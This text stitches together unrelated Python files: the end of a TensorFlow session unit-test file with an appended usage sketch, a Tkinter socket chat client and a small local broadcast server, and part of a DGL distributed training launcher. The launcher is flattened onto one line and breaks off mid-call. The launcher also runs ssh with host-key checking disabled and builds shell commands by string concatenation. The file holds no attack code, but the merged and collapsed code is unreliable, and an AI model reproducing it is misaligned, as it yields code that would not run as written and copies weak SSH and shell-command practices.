            dtype=np.object).reshape(shape) if size > 0 else []
        c = constant_op.constant(c_list)
        self.assertAllEqual(c.eval(), c_list)

  def testStringFeed(self):
    with session.Session() as sess:
      for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
        size = 1
        for s in shape:
          size *= s
        c_list = np.array(
            [compat.as_bytes(str(i)) for i in xrange(size)],
            dtype=np.object).reshape(shape)
        feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape)
        c = array_ops.identity(feed_t)
        self.assertAllEqual(sess.run(c, feed_dict={feed_t: c_list}), c_list)
        self.assertAllEqual(
            sess.run(feed_t, feed_dict={
                feed_t: c_list
            }), c_list)
        c_v, feed_v = sess.run([c, feed_t], feed_dict={feed_t: c_list})
        self.assertAllEqual(c_v, c_list)
        self.assertAllEqual(feed_v, c_list)

  def testStringFeedWithNullCharacters(self):
    with session.Session():
      c_list = [b'\n\x01\x00', b'\n\x00\x01']
      feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
      c = array_ops.identity(feed_t)
      out = c.eval(feed_dict={feed_t: c_list})
      self.assertEqual(c_list[0], out[0])
      self.assertEqual(c_list[1], out[1])

  def testStringFeedWithUnicode(self):
    with session.Session():
      c_list = [
          u'\n\x01\x00', u'\n\x00\x01', u'\u26a3 unicode',
          u'\U0001f60e deal with it'
      ]
      feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[len(c_list)])
      c = array_ops.identity(feed_t)

      out = c.eval(feed_dict={feed_t: c_list})
      for i in range(len(c_list)):
        self.assertEqual(c_list[i], out[i].decode('utf-8'))

      out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
      for i in range(len(c_list)):
        self.assertEqual(c_list[i], out[i].decode('utf-8'))

  def testInvalidTargetFails(self):
    with self.assertRaisesRegexp(
        errors.NotFoundError,
        'No session factory registered for the given session options'):
      session.Session('INVALID_TARGET')

  def testFetchByNameDifferentStringTypes(self):
    with session.Session() as sess:
      c = constant_op.constant(42.0, name='c')
      d = constant_op.constant(43.0, name=u'd')
      e = constant_op.constant(44.0, name=b'e')
      f = constant_op.constant(45.0, name=r'f')

      self.assertTrue(isinstance(c.name, six.text_type))
      self.assertTrue(isinstance(d.name, six.text_type))
      self.assertTrue(isinstance(e.name, six.text_type))
      self.assertTrue(isinstance(f.name, six.text_type))

      self.assertEqual(42.0, sess.run('c:0'))
      self.assertEqual(42.0, sess.run(u'c:0'))
      self.assertEqual(42.0, sess.run(b'c:0'))
      self.assertEqual(42.0, sess.run(r'c:0'))

      self.assertEqual(43.0, sess.run('d:0'))
      self.assertEqual(43.0, sess.run(u'd:0'))
      self.assertEqual(43.0, sess.run(b'd:0'))
      self.assertEqual(43.0, sess.run(r'd:0'))

      self.assertEqual(44.0, sess.run('e:0'))
      self.assertEqual(44.0, sess.run(u'e:0'))
      self.assertEqual(44.0, sess.run(b'e:0'))
      self.assertEqual(44.0, sess.run(r'e:0'))

      self.assertEqual(45.0, sess.run('f:0'))
      self.assertEqual(45.0, sess.run(u'f:0'))
      self.assertEqual(45.0, sess.run(b'f:0'))
      self.assertEqual(45.0, sess.run(r'f:0'))

  def testIncorrectGraph(self):
    with ops.Graph().as_default() as g_1:
      c_1 = constant_op.constant(1.0, name='c')

    with ops.Graph().as_default() as g_2:
      c_2 = constant_op.constant(2.0, name='c')

    self.assertEqual('c', c_1.op.name)
    self.assertEqual('c', c_2.op.name)

    with session.Session(graph=g_1) as sess_1:
      self.assertEqual(1.0, sess_1.run(c_1))
      with self.assertRaises(ValueError):
        sess_1.run(c_2)
      with self.assertRaises(ValueError):
        sess_1.run(c_2.op)

    with session.Session(graph=g_2) as sess_2:
      with self.assertRaises(ValueError):
        sess_2.run(c_1)
      with self.assertRaises(ValueError):
        sess_2.run(c_1.op)
      self.assertEqual(2.0, sess_2.run(c_2))

  def testFeedDictKeyException(self):
    with session.Session() as sess:
      a = constant_op.constant(1.0, dtypes.float32, name='a')
      with self.assertRaisesRegexp(TypeError, 'Cannot interpret feed_dict'):
        sess.run(a, feed_dict={'a': [2.0]})

  def testPerStepTrace(self):
    run_options = config_pb2.RunOptions(
        trace_level=config_pb2.RunOptions.FULL_TRACE)
    run_metadata = config_pb2.RunMetadata()

    with ops.device('/cpu:0'):
      with session.Session() as sess:
        sess.run(constant_op.constant(1.0))
        self.assertTrue(not run_metadata.HasField('step_stats'))

        sess.run(constant_op.constant(1.0), run_metadata=run_metadata)
        self.assertTrue(not run_metadata.HasField('step_stats'))

        sess.run(
            constant_op.constant(1.0),
            options=run_options,
            run_metadata=run_metadata)

        self.assertTrue(run_metadata.HasField('step_stats'))
        self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)

  def testRunOptionsRunMetadata(self):
    run_options = config_pb2.RunOptions(
        trace_level=config_pb2.RunOptions.FULL_TRACE)
    run_metadata = config_pb2.RunMetadata()

    with ops.device('/cpu:0'):
      with session.Session() as sess:
        # all combinations are valid
        sess.run(constant_op.constant(1.0), options=None, run_metadata=None)
        sess.run(
            constant_op.constant(1.0), options=None,
            run_metadata=run_metadata)
        self.assertTrue(not run_metadata.HasField('step_stats'))

        sess.run(
            constant_op.constant(1.0), options=run_options, run_metadata=None)
        self.assertTrue(not run_metadata.HasField('step_stats'))

        sess.run(
            constant_op.constant(1.0),
            options=run_options,
            run_metadata=run_metadata)

        self.assertTrue(run_metadata.HasField('step_stats'))
        self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)

  def testFeedShapeCompatibility(self):
    with session.Session() as sess:
      some_tensor = constant_op.constant([2.0, 2.0, 2.0, 2.0])
      new_shape = constant_op.constant([2, 2])
      reshaped_tensor = array_ops.reshape(some_tensor, new_shape)

      with self.assertRaisesRegexp(ValueError, 'Cannot feed value of shape'):
        sess.run(reshaped_tensor, feed_dict={some_tensor: [1.0, 2.0, 3.0]})

      with self.assertRaisesRegexp(
          errors.InvalidArgumentError,
          'Input to reshape is a tensor with 4 values, '
          'but the requested shape has 21'):
        sess.run(reshaped_tensor, feed_dict={new_shape: [3, 7]})

  def testInferShapesFalse(self):
    with ops.Graph().as_default(), ops.device('/cpu:0'):
      a = constant_op.constant([[1, 2]])
      sess = session.Session()
      self.assertFalse('_output_shapes' in sess.graph_def.node[0].attr)
      # Avoid lint error regarding 'unused' var a.
      self.assertTrue(a == a)

  def testInferShapesTrue(self):
    config_pb = config_pb2.ConfigProto(
        graph_options=config_pb2.GraphOptions(infer_shapes=True))
    with ops.Graph().as_default(), ops.device('/cpu:0'):
      a = constant_op.constant([[1, 2]])
      sess = session.Session(config=config_pb)
      self.assertTrue('_output_shapes' in sess.graph_def.node[0].attr)
      # Avoid lint error regarding 'unused' var a.
      self.assertTrue(a == a)

  def testBuildCostModel(self):
    run_options = config_pb2.RunOptions()
    config_pb = config_pb2.ConfigProto(
        allow_soft_placement=True,
        graph_options=config_pb2.GraphOptions(build_cost_model=100))
    with session.Session(config=config_pb) as sess:
      with ops.device('/device:GPU:0'):
        a = array_ops.placeholder(dtypes.float32, shape=[])
        b = math_ops.add(a, a)
        c = array_ops.identity(b)
        d = math_ops.multiply(c, c)
      for step in xrange(120):
        run_metadata = config_pb2.RunMetadata()
        sess.run(
            d,
            feed_dict={a: 1.0},
            options=run_options,
            run_metadata=run_metadata)
        if step == 99:
          self.assertTrue(run_metadata.HasField('cost_graph'))
        else:
          self.assertFalse(run_metadata.HasField('cost_graph'))

  def runTestOutputPartitionGraphs(self, sess):
    run_options = config_pb2.RunOptions(output_partition_graphs=True)
    a = constant_op.constant(1)
    run_metadata = config_pb2.RunMetadata()
    sess.run(a, options=run_options, run_metadata=run_metadata)
    self.assertGreater(len(run_metadata.partition_graphs), 0)
    sess.run(a, run_metadata=run_metadata)
    self.assertEqual(len(run_metadata.partition_graphs), 0)

  @test_util.run_v1_only('b/120545219')
  def testOutputPartitionGraphsDirect(self):
    self.runTestOutputPartitionGraphs(session.Session())

  @test_util.run_v1_only('b/120545219')
  def testOutputPartitionGraphsDistributed(self):
    server = server_lib.Server.create_local_server()
    self.runTestOutputPartitionGraphs(session.Session(server.target))

  def testNonInteractiveSessionNesting(self):
    sess1 = session.Session()
    sess1_controller = sess1.as_default()
    sess1_controller.__enter__()

    sess2 = session.Session()
    sess2_controller = sess2.as_default()
    sess2_controller.__enter__()

    with self.assertRaisesRegexp(AssertionError, 'Nesting violated'):
      sess1_controller.__exit__(None, None, None)

    ops._default_session_stack.reset()

  def testInteractiveSessionNesting(self):
    sess1 = session.InteractiveSession()
    sess2 = session.InteractiveSession()
    del sess1
    del sess2

  @test_util.run_v1_only('b/120545219')
  def testAsDefault(self):
    c = constant_op.constant(37)
    sess = session.Session()
    with sess.as_default():
      self.assertEqual(37, c.eval())

    # Ensure that the session remains valid even when it is not captured.
    with session.Session().as_default():
      self.assertEqual(37, c.eval())

  def testReentry(self):
    sess = session.Session()
    with self.assertRaisesRegexp(RuntimeError, 'not re-entrant'):
      with sess:
        with sess:
          pass

  def testInvalidArgument(self):
    with self.assertRaisesRegexp(TypeError, 'target must be a string'):
      session.Session(37)
    with self.assertRaisesRegexp(TypeError, 'config must be a tf.ConfigProto'):
      session.Session(config=37)
    with self.assertRaisesRegexp(TypeError, 'graph must be a tf.Graph'):
      session.Session(graph=37)

  @test_util.run_v1_only('b/120545219')
  def testTimeoutWithShortOperations(self):
    num_epochs = 5
    q = data_flow_ops.FIFOQueue(capacity=50, dtypes=[dtypes.int32], shapes=[()])
    enqueue_op = q.enqueue_many(constant_op.constant([1, 2]))

    # Use a 10-second timeout, which should be longer than any
    # non-blocking enqueue_many op.
    config_pb = config_pb2.ConfigProto(operation_timeout_in_ms=10000)
    with session.Session(config=config_pb) as sess:
      for _ in range(num_epochs):
        sess.run(enqueue_op)
      self.assertEqual(sess.run(q.size()), num_epochs * 2)

  @test_util.run_v1_only('b/120545219')
  def testRegisterFetchAndFeedConversionFunctions(self):

    class SquaredTensor(object):

      def __init__(self, tensor):
        self.sq = math_ops.square(tensor)

    fetch_fn = lambda squared_tensor: ([squared_tensor.sq], lambda val: val[0])
    feed_fn1 = lambda feed, feed_val: [(feed.sq, feed_val)]
    feed_fn2 = lambda feed: [feed.sq]

    session.register_session_run_conversion_functions(SquaredTensor, fetch_fn,
                                                      feed_fn1, feed_fn2)
    with self.assertRaises(ValueError):
      session.register_session_run_conversion_functions(SquaredTensor,
                                                        fetch_fn, feed_fn1,
                                                        feed_fn2)
    with self.cached_session() as sess:
      np1 = np.array([1.0, 1.5, 2.0, 2.5])
      np2 = np.array([3.0, 3.5, 4.0, 4.5])
      squared_tensor = SquaredTensor(np2)
      squared_eval = sess.run(squared_tensor)
      self.assertAllClose(np2 * np2, squared_eval)
      squared_eval = sess.run(
          squared_tensor, feed_dict={
              squared_tensor: np1 * np1
          })
      self.assertAllClose(np1 * np1, squared_eval)
      partial_run = sess.partial_run_setup([squared_tensor], [])
      squared_eval = sess.partial_run(partial_run, squared_tensor)
      self.assertAllClose(np2 * np2, squared_eval)

  def testDefaultLogDevicePlacement(self):

    class CaptureStderr(str):
      """Class to capture stderr from C++ shared library."""

      def __enter__(self):
        self._esc = compat.as_str('\b')
        self._output = compat.as_str('')
        self._stderr = sys.stderr
        self._fd = self._stderr.fileno()
        self._out_pipe, in_pipe = os.pipe()
        # Save the original io stream.
        self._dup_fd = os.dup(self._fd)
        # Replace the original io stream with in pipe.
        os.dup2(in_pipe, self._fd)
        return self

      def __exit__(self, *args):
        self._stderr.write(self._esc)
        self._stderr.flush()
        self.read()
        os.close(self._out_pipe)
        # Restore the original io stream.
        os.dup2(self._dup_fd, self._fd)

      def read(self):
        while True:
          data = os.read(self._out_pipe, 1)
          if not data or compat.as_str(data) == self._esc:
            break
          self._output += compat.as_str(data)

      def __str__(self):
        return self._output

    if context.executing_eagerly():
      context.set_log_device_placement(True)
      with CaptureStderr() as log:
        a = constant_op.constant(1)
        b = constant_op.constant(2)
        c = a + b
    else:
      # Passing the config to the server, but not the session should still
      # result in logging device placement.
      config_pb = config_pb2.ConfigProto(log_device_placement=True)
      server = server_lib.Server.create_local_server(config=config_pb)
      a = constant_op.constant(1)
      b = constant_op.constant(2)
      c = a + b
      with session.Session(server.target) as sess:
        with CaptureStderr() as log:
          sess.run(c)

    # Ensure that we did log device placement.
    device_type = test_util.gpu_device_type() or "CPU"
    device_name = '/replica:0/task:0/device:%s:0' % device_type
    self.assertTrue(device_name in str(log), str(log))

  @test_util.run_v1_only('b/120545219')
  def testLocalMasterSessionTimeout(self):
    # Test that the timeout passed in a config to the session works correctly.
    config_pb = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
    server = server_lib.Server.create_local_server()
    q = data_flow_ops.FIFOQueue(1, dtypes.float32)
    dequeued_t = q.dequeue()

    with session.Session(server.target, config=config_pb) as sess:
      # Intentionally do not run any enqueue_ops so that dequeue will block
      # until operation_timeout_in_ms.
      with self.assertRaises(errors.DeadlineExceededError):
        sess.run(dequeued_t)

  @test_util.run_v1_only('b/120545219')
  def testDefaultServerTimeout(self):
    # Test that the default server config timeout gets used when no Session
    # config is provided.
    config_pb = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
    server = server_lib.Server.create_local_server(config=config_pb)
    q = data_flow_ops.FIFOQueue(1, dtypes.float32)
    dequeued_t = q.dequeue()

    with session.Session(server.target) as sess:
      # Intentionally do not run any enqueue_ops so that dequeue will block
      # until operation_timeout_in_ms.
      with self.assertRaises(errors.DeadlineExceededError):
        sess.run(dequeued_t)

  def runTestBuildGraphError(self, sess):
    # Ensure that errors from building the graph get propagated.
    data = array_ops.placeholder(dtypes.float32, shape=[])
    # pylint: disable=protected-access
    enter_1 = gen_control_flow_ops.enter(data, 'foo_1', False)
    enter_2 = gen_control_flow_ops.enter(data, 'foo_2', False)
    # pylint: enable=protected-access
    res = math_ops.add(enter_1, enter_2)
    with self.assertRaisesOpError('has inputs from different frames'):
      sess.run(res, feed_dict={data: 1.0})

  @test_util.run_v1_only('b/120545219')
  def testBuildGraphErrorDirect(self):
    self.runTestBuildGraphError(session.Session())

  @test_util.run_v1_only('b/120545219')
  def testBuildGraphErrorDist(self):
    server = server_lib.Server.create_local_server()
    self.runTestBuildGraphError(session.Session(server.target))

  def testDeviceAttributes(self):
    attrs = session._DeviceAttributes(
        '/job:worker/replica:0/task:3/device:CPU:2', 'TYPE', 1337, 1000000)
    self.assertEqual(1337, attrs.memory_limit_bytes)
    self.assertEqual('/job:worker/replica:0/task:3/device:CPU:2', attrs.name)
    self.assertEqual('TYPE', attrs.device_type)
    self.assertEqual(1000000, attrs.incarnation)
    str_repr = '%s' % attrs
    self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)

  def testDeviceAttributesCanonicalization(self):
    attrs = session._DeviceAttributes('/job:worker/replica:0/task:3/cpu:1',
                                      'TYPE', 1337, 1000000)
    self.assertEqual(1337, attrs.memory_limit_bytes)
    self.assertEqual('/job:worker/replica:0/task:3/device:CPU:1', attrs.name)
    self.assertEqual('TYPE', attrs.device_type)
    self.assertEqual(1000000, attrs.incarnation)
    str_repr = '%s' % attrs
    self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)

  def runTestAddFunctionToSession(self, target=''):
    """Add a function to a session after the graph has already been run."""

    @function.Defun(dtypes.float32)
    def foo(x):
      return x + 1

    x = constant_op.constant(1.0)
    with session.Session(target=target) as sess:
      sess.run(x)
      f = foo(x)
      result = sess.run(f)
      self.assertEqual(result, 2.0)

  @test_util.run_v1_only('b/120545219')
  def testAddFunctionToSession(self):
    self.runTestAddFunctionToSession()

  @test_util.run_v1_only('b/120545219')
  def testAddFunctionToGrpcSession(self):
    server = server_lib.Server.create_local_server()
    self.runTestAddFunctionToSession(server.target)

  def testOpenAndCloseGrpcSession(self):
    server = server_lib.Server.create_local_server()
    with session.Session(server.target):
      pass

  def testOpenAndCloseSession(self):
    with session.Session():
      pass

  @test_util.run_v1_only('b/120545219')
  def testAutoConvertAndCheckData(self):
    with self.cached_session() as sess:
      a = array_ops.placeholder(dtype=dtypes.string)
      with self.assertRaisesRegexp(
          TypeError, r'Type of feed value 1 with type <(\w+) \'int\'> is not'):
        sess.run(a, feed_dict={a: 1})

  @test_util.run_v1_only('b/120545219')
  def testOptimizerOptions(self):
    config.set_optimizer_experimental_options({'min_graph_nodes': -1})

    with ops.Graph().as_default():
      sess = session.Session()
      self.assertEqual(
          sess._config.graph_options.rewrite_options.min_graph_nodes, -1)


if __name__ == '__main__':
  googletest.main()
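# A minimal, self-contained sketch (not part of the original test file) of the
# nested-fetch behavior the tests above exercise, assuming a TF 1.x-style graph
# API accessed via tf.compat.v1: `sess.run` mirrors the structure of its fetch
# argument, so tuples come back as tuples, dicts as dicts, and an op fetch
# comes back as None.
import tensorflow.compat.v1 as tf

tf.disable_eager_execution()

with tf.Session() as sess:
    a = tf.constant(42.0)
    b = tf.no_op()  # An op, not a tensor; fetched as None.
    c = tf.constant(44.0)
    out = sess.run({'pair': (a, c), 'op': b, 'single': a})
    assert out['pair'] == (42.0, 44.0)
    assert out['op'] is None
    assert out['single'] == 42.0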
chat_client_gui.py
#!/usr/bin/env python3
"""Script for Tkinter GUI chat client."""
import os
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
import tkinter


def receive():
    """Handles receiving of messages."""
    while True:
        try:
            msg = client_socket.recv(BUFSIZ).decode("utf8")
            msg_list.insert(tkinter.END, msg)
        except OSError:  # Possibly client has left the chat.
            break


def send(event=None):  # event is passed by binders.
    """Handles sending of messages."""
    msg = my_msg.get()
    my_msg.set("")  # Clears input field.
    client_socket.send(bytes(msg, "utf8"))
    if msg == "{quit}":
        client_socket.close()
        top.quit()


def on_closing(event=None):
    """This function is to be called when the window is closed."""
    my_msg.set("{quit}")
    send()


top = tkinter.Tk()
top.title("Chatter")

messages_frame = tkinter.Frame(top)
my_msg = tkinter.StringVar()  # For the messages to be sent.
my_msg.set("Type your messages here.")
scrollbar = tkinter.Scrollbar(messages_frame)  # To navigate through past messages.
# Following will contain the messages.
msg_list = tkinter.Listbox(
    messages_frame, height=15, width=50, yscrollcommand=scrollbar.set
)
scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)
msg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)
msg_list.pack()
messages_frame.pack()

entry_field = tkinter.Entry(top, textvariable=my_msg)
entry_field.bind("<Return>", send)
entry_field.pack()
send_button = tkinter.Button(top, text="Send", command=send)
send_button.pack()

top.protocol("WM_DELETE_WINDOW", on_closing)

CHAT_SERVER_HOST = os.getenv("CHAT_SERVER_HOST", "bueno.network")
CHAT_SERVER_PORT = os.getenv("CHAT_SERVER_PORT", 1119)

print(
    "Connecting to chat server at {HOST}:{PORT}".format(
        HOST=CHAT_SERVER_HOST, PORT=CHAT_SERVER_PORT
    )
)

BUFSIZ = 1024
ADDR = (CHAT_SERVER_HOST, int(CHAT_SERVER_PORT))

client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.connect(ADDR)

receive_thread = Thread(target=receive)
receive_thread.start()
tkinter.mainloop()  # Starts GUI execution.
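# The matching server is not included in this file; below is a hypothetical,
# minimal broadcast server sketched only for local testing of the client above.
# It assumes the client's conventions -- UTF-8 text, 1024-byte reads, and
# "{quit}" as the disconnect sentinel -- and relays every message to all
# connected clients. Run it, then point the client at it via
# CHAT_SERVER_HOST=127.0.0.1 CHAT_SERVER_PORT=1119.
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread

clients = []


def handle_client(sock):
    """Relays each incoming message to every connected client."""
    while True:
        msg = sock.recv(1024).decode("utf8")
        if not msg or msg == "{quit}":
            clients.remove(sock)
            sock.close()
            break
        for client in clients:
            client.send(bytes(msg, "utf8"))


server = socket(AF_INET, SOCK_STREAM)
server.bind(("127.0.0.1", 1119))
server.listen(5)
while True:
    client_sock, _ = server.accept()
    clients.append(client_sock)
    Thread(target=handle_client, args=(client_sock,), daemon=True).start()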
launch.py
"""Launching tool for DGL distributed training""" import os import stat import sys import subprocess import argparse import signal import logging import time import json import multiprocessing import re from functools import partial from threading import Thread from typing import Optional DEFAULT_PORT = 30050 def cleanup_proc(get_all_remote_pids, conn): '''This process tries to clean up the remote training tasks. ''' print('cleanupu process runs') # This process should not handle SIGINT. signal.signal(signal.SIGINT, signal.SIG_IGN) data = conn.recv() # If the launch process exits normally, this process doesn't need to do anything. if data == 'exit': sys.exit(0) else: remote_pids = get_all_remote_pids() # Otherwise, we need to ssh to each machine and kill the training jobs. for (ip, port), pids in remote_pids.items(): kill_process(ip, port, pids) print('cleanup process exits') def kill_process(ip, port, pids): '''ssh to a remote machine and kill the specified processes. ''' curr_pid = os.getpid() killed_pids = [] # If we kill child processes first, the parent process may create more again. This happens # to Python's process pool. After sorting, we always kill parent processes first. pids.sort() for pid in pids: assert curr_pid != pid print('kill process {} on {}:{}'.format(pid, ip, port), flush=True) kill_cmd = 'ssh -o StrictHostKeyChecking=no -p ' + str(port) + ' ' + ip + ' \'kill {}\''.format(pid) subprocess.run(kill_cmd, shell=True) killed_pids.append(pid) # It's possible that some of the processes are not killed. Let's try again. for i in range(3): killed_pids = get_killed_pids(ip, port, killed_pids) if len(killed_pids) == 0: break else: killed_pids.sort() for pid in killed_pids: print('kill process {} on {}:{}'.format(pid, ip, port), flush=True) kill_cmd = 'ssh -o StrictHostKeyChecking=no -p ' + str(port) + ' ' + ip + ' \'kill -9 {}\''.format(pid) subprocess.run(kill_cmd, shell=True) def get_killed_pids(ip, port, killed_pids): '''Get the process IDs that we want to kill but are still alive. ''' killed_pids = [str(pid) for pid in killed_pids] killed_pids = ','.join(killed_pids) ps_cmd = 'ssh -o StrictHostKeyChecking=no -p ' + str(port) + ' ' + ip + ' \'ps -p {} -h\''.format(killed_pids) res = subprocess.run(ps_cmd, shell=True, stdout=subprocess.PIPE) pids = [] for p in res.stdout.decode('utf-8').split('\n'): l = p.split() if len(l) > 0: pids.append(int(l[0])) return pids def execute_remote( cmd: str, ip: str, port: int, username: Optional[str] = "" ) -> Thread: """Execute command line on remote machine via ssh. Args: cmd: User-defined command (udf) to execute on the remote host. ip: The ip-address of the host to run the command on. port: Port number that the host is listening on. thread_list: username: Optional. If given, this will specify a username to use when issuing commands over SSH. Useful when your infra requires you to explicitly specify a username to avoid permission issues. Returns: thread: The Thread whose run() is to run the `cmd` on the remote host. Returns when the cmd completes on the remote host. 
""" ip_prefix = "" if username: ip_prefix += "{username}@".format(username=username) # Construct ssh command that executes `cmd` on the remote host ssh_cmd = "ssh -o StrictHostKeyChecking=no -p {port} {ip_prefix}{ip} '{cmd}'".format( port=str(port), ip_prefix=ip_prefix, ip=ip, cmd=cmd, ) # thread func to run the job def run(ssh_cmd): subprocess.check_call(ssh_cmd, shell=True) thread = Thread(target=run, args=(ssh_cmd,)) thread.setDaemon(True) thread.start() return thread def get_remote_pids(ip, port, cmd_regex): """Get the process IDs that run the command in the remote machine. """ pids = [] curr_pid = os.getpid() # Here we want to get the python processes. We may get some ssh processes, so we should filter them out. ps_cmd = 'ssh -o StrictHostKeyChecking=no -p ' + str(port) + ' ' + ip + ' \'ps -aux | grep python | grep -v StrictHostKeyChecking\'' res = subprocess.run(ps_cmd, shell=True, stdout=subprocess.PIPE) for p in res.stdout.decode('utf-8').split('\n'): l = p.split() if len(l) < 2: continue # We only get the processes that run the specified command. res = re.search(cmd_regex, p) if res is not None and int(l[1]) != curr_pid: pids.append(l[1]) pid_str = ','.join([str(pid) for pid in pids]) ps_cmd = 'ssh -o StrictHostKeyChecking=no -p ' + str(port) + ' ' + ip + ' \'pgrep -P {}\''.format(pid_str) res = subprocess.run(ps_cmd, shell=True, stdout=subprocess.PIPE) pids1 = res.stdout.decode('utf-8').split('\n') all_pids = [] for pid in set(pids + pids1): if pid == '' or int(pid) == curr_pid: continue all_pids.append(int(pid)) all_pids.sort() return all_pids def get_all_remote_pids(hosts, ssh_port, udf_command): '''Get all remote processes. ''' remote_pids = {} for node_id, host in enumerate(hosts): ip, _ = host # When creating training processes in remote machines, we may insert some arguments # in the commands. We need to use regular expressions to match the modified command. cmds = udf_command.split() new_udf_command = ' .*'.join(cmds) pids = get_remote_pids(ip, ssh_port, new_udf_command) remote_pids[(ip, ssh_port)] = pids return remote_pids def construct_torch_dist_launcher_cmd( num_trainers: int, num_nodes: int, node_rank: int, master_addr: str, master_port: int ) -> str: """Constructs the torch distributed launcher command. Helper function. Args: num_trainers: num_nodes: node_rank: master_addr: master_port: Returns: cmd_str. """ torch_cmd_template = "-m torch.distributed.launch " \ "--nproc_per_node={nproc_per_node} " \ "--nnodes={nnodes} " \ "--node_rank={node_rank} " \ "--master_addr={master_addr} " \ "--master_port={master_port}" return torch_cmd_template.format( nproc_per_node=num_trainers, nnodes=num_nodes, node_rank=node_rank, master_addr=master_addr, master_port=master_port ) def wrap_udf_in_torch_dist_launcher( udf_command: str, num_trainers: int, num_nodes: int, node_rank: int, master_addr: str, master_port: int, ) -> str: """Wraps the user-defined function (udf_command) with the torch.distributed.launch module. Example: if udf_command is "python3 run/some/trainer.py arg1 arg2", then new_df_command becomes: "python3 -m torch.distributed.launch <TORCH DIST ARGS> run/some/trainer.py arg1 arg2 udf_command is assumed to consist of pre-commands (optional) followed by the python launcher script (required): Examples: # simple python3.7 path/to/some/trainer.py arg1 arg2 # multi-commands (cd some/dir && python3.7 path/to/some/trainer.py arg1 arg2) IMPORTANT: If udf_command consists of multiple python commands, then this will result in undefined behavior. 
Args: udf_command: num_trainers: num_nodes: node_rank: master_addr: master_port: Returns: """ torch_dist_cmd = construct_torch_dist_launcher_cmd( num_trainers=num_trainers, num_nodes=num_nodes, node_rank=node_rank, master_addr=master_addr, master_port=master_port ) # Auto-detect the python binary that kicks off the distributed trainer code. # Note: This allowlist order matters, this will match with the FIRST matching entry. Thus, please add names to this # from most-specific to least-specific order eg: # (python3.7, python3.8) -> (python3) # The allowed python versions are from this: https://www.dgl.ai/pages/start.html python_bin_allowlist = ( "python3.6", "python3.7", "python3.8", "python3.9", "python3", # for backwards compatibility, accept python2 but technically DGL is a py3 library, so this is not recommended "python2.7", "python2", ) # If none of the candidate python bins match, then we go with the default `python` python_bin = "python" for candidate_python_bin in python_bin_allowlist: if candidate_python_bin in udf_command: python_bin = candidate_python_bin break # transforms the udf_command from: # python path/to/dist_trainer.py arg0 arg1 # to: # python -m torch.distributed.launch [DIST TORCH ARGS] path/to/dist_trainer.py arg0 arg1 # Note: if there are multiple python commands in `udf_command`, this may do the Wrong Thing, eg launch each # python command within the torch distributed launcher. new_udf_command = udf_command.replace(python_bin, f"{python_bin} {torch_dist_cmd}") return new_udf_command def construct_dgl_server_env_vars( num_samplers: int, num_server_threads: int, tot_num_clients: int, part_config: str, ip_config: str, num_servers: int, graph_format: str, pythonpath: Optional[str] = "", ) -> str: """Constructs the DGL server-specific env vars string that are required for DGL code to behave in the correct server role. Convenience function. Args: num_samplers: num_server_threads: tot_num_clients: part_config: Partition config. Relative path to workspace. ip_config: IP config file containing IP addresses of cluster hosts. Relative path to workspace. num_servers: graph_format: pythonpath: Optional. If given, this will pass this as PYTHONPATH. Returns: server_env_vars: The server-specific env-vars in a string format, friendly for CLI execution. """ server_env_vars_template = ( "DGL_ROLE={DGL_ROLE} " "DGL_NUM_SAMPLER={DGL_NUM_SAMPLER} " "OMP_NUM_THREADS={OMP_NUM_THREADS} " "DGL_NUM_CLIENT={DGL_NUM_CLIENT} " "DGL_CONF_PATH={DGL_CONF_PATH} " "DGL_IP_CONFIG={DGL_IP_CONFIG} " "DGL_NUM_SERVER={DGL_NUM_SERVER} " "DGL_GRAPH_FORMAT={DGL_GRAPH_FORMAT} " "{suffix_optional_envvars}" ) suffix_optional_envvars = "" if pythonpath: suffix_optional_envvars += f"PYTHONPATH={pythonpath} " return server_env_vars_template.format( DGL_ROLE="server", DGL_NUM_SAMPLER=num_samplers, OMP_NUM_THREADS=num_server_threads, DGL_NUM_CLIENT=tot_num_clients, DGL_CONF_PATH=part_config, DGL_IP_CONFIG=ip_config, DGL_NUM_SERVER=num_servers, DGL_GRAPH_FORMAT=graph_format, suffix_optional_envvars=suffix_optional_envvars, ) def construct_dgl_client_env_vars( num_samplers: int, tot_num_clients: int, part_config: str, ip_config: str, num_servers: int, graph_format: str, num_omp_threads: int, pythonpath: Optional[str] = "", ) -> str: """Constructs the DGL client-specific env vars string that are required for DGL code to behave in the correct client role. Convenience function. Args: num_samplers: tot_num_clients: part_config: Partition config. Relative path to workspace. 
ip_config: IP config file containing IP addresses of cluster hosts. Relative path to workspace. num_servers: graph_format: num_omp_threads: pythonpath: Optional. If given, this will pass this as PYTHONPATH. Returns: client_env_vars: The client-specific env-vars in a string format, friendly for CLI execution. """ client_env_vars_template = ( "DGL_DIST_MODE={DGL_DIST_MODE} " "DGL_ROLE={DGL_ROLE} " "DGL_NUM_SAMPLER={DGL_NUM_SAMPLER} " "DGL_NUM_CLIENT={DGL_NUM_CLIENT} " "DGL_CONF_PATH={DGL_CONF_PATH} " "DGL_IP_CONFIG={DGL_IP_CONFIG} " "DGL_NUM_SERVER={DGL_NUM_SERVER} " "DGL_GRAPH_FORMAT={DGL_GRAPH_FORMAT} " "OMP_NUM_THREADS={OMP_NUM_THREADS} " "{suffix_optional_envvars}" ) # append optional additional env-vars suffix_optional_envvars = "" if pythonpath: suffix_optional_envvars += f"PYTHONPATH={pythonpath} " return client_env_vars_template.format( DGL_DIST_MODE="distributed", DGL_ROLE="client", DGL_NUM_SAMPLER=num_samplers, DGL_NUM_CLIENT=tot_num_clients, DGL_CONF_PATH=part_config, DGL_IP_CONFIG=ip_config, DGL_NUM_SERVER=num_servers, DGL_GRAPH_FORMAT=graph_format, OMP_NUM_THREADS=num_omp_threads, 